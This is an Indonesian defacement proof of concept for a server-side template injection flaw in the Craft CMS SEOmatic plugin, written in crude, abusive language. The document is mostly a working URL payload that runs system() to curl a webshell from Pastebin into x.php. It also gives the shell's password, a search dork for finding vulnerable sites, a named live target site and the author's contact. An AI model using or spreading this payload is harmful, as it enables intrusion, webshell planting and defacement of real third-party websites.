Deface Poc SSTI to RCE
(Server-Side Template Injection) + (Remote Code Execution)
Exploit : /actions/seomatic/meta-container/all-meta-containers?uri=
RCE Code =
{{craft.app.view.evaluateDynamicContent(%27print(system(%22curl\x20https://pastebin.com/raw/1Wg3u06u\x20%3E\x20x.php%22));%27)}}
Itu link pastebin nya bisa lu ganti ke punya lu
Nama file = x.php
Password = aryaganteng
dork : site:*/humans.txt intext:SEOmatic
Paham ga kontol
https://weblo.com/actions/seomatic/meta-container/all-meta-containers?uri=
Kasih kode rce nya di belakang uri=
Seperti ini.
https://weblo.com/actions/seomatic/meta-container/all-meta-containers?uri={{craft.app.view.evaluateDynamicContent(%27print(system(%22curl\x20https://pastebin.com/raw/1Wg3u06u\x20%3E\x20x.php%22));%27)}}
Akses Shell
https://weblo.com/actions/seomatic/meta-container/all-meta-containers?uri=
Kasih kode rce nya di belakang uri=
Seperti ini.
https://weblo.com/actions/seomatic/meta-container/all-meta-containers?uri={{craft.app.view.evaluateDynamicContent(%27print(system(%22curl\x20https://pastebin.com/raw/1Wg3u06u\x20%3E\x20x.php%22));%27)}}
Akses Shell
Site.com/namashell.php
Live Target :
https://www.shopmoment.com/actions/seomatic/meta-container/all-meta-containers?uri=
Lebih jelas lagi.
https://youtu.be/nGjv-P_hhHg
Live Target :
https://www.shopmoment.com/actions/seomatic/meta-container/all-meta-containers?uri=
Lebih jelas lagi.
https://youtu.be/nGjv-P_hhHg
Contact : ncdream72@gmail.com
EmoticonEmoticon